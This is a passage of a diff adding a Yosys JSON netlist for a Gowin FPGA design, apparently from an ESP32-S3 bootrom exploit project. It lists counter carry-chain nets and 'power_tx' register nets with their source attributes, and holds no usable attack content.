"led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 191 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 193 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 195 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 197 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 199 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 201 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 203 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 205 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 207 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 209 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 211 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 213 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 215 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 217 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 219 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 221 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 223 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 225 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 227 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN": { + "hide_name": 0, + "bits": [ 229 ], + "attributes": { + "abc9_carry": "00000000000000000000000000000001", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:44.12-44.53|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_sim.v:938.25-938.29" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 231 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 230 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 228 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 226 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 224 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 222 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 220 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 218 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 216 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 214 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 212 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 210 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 208 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 206 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 204 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 202 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 200 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 198 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 196 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 194 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 192 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 190 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_CIN_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 188 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I1_ALU_COUT_SUM": { + "hide_name": 0, + "bits": [ 186 ], + "attributes": { + "unused_bits": "0 " + } + }, + "led_run_LUT3_I0_F": { + "hide_name": 0, + "bits": [ 232 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "led_run_LUT3_I0_F_MUX2_LUT5_I0_O": { + "hide_name": 0, + "bits": [ 119 ], + "attributes": { + } + }, + "led_run_LUT4_I0_1_F": { + "hide_name": 0, + "bits": [ 234 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "led_run_LUT4_I0_F": { + "hide_name": 0, + "bits": [ 116 ], + "attributes": { + } + }, + "power_tx": { + "hide_name": 0, + "bits": [ 4 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:6.12-6.20" + } + }, + "power_tx_reg": { + "hide_name": 0, + "bits": [ 237, 27 ], + "attributes": { + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:22.11-22.23" + } + }, + "power_tx_reg_DFFS_Q_D": { + "hide_name": 0, + "bits": [ 238 ], + "attributes": { + } + }, + "power_tx_reg_DFFS_Q_D_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 239 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + 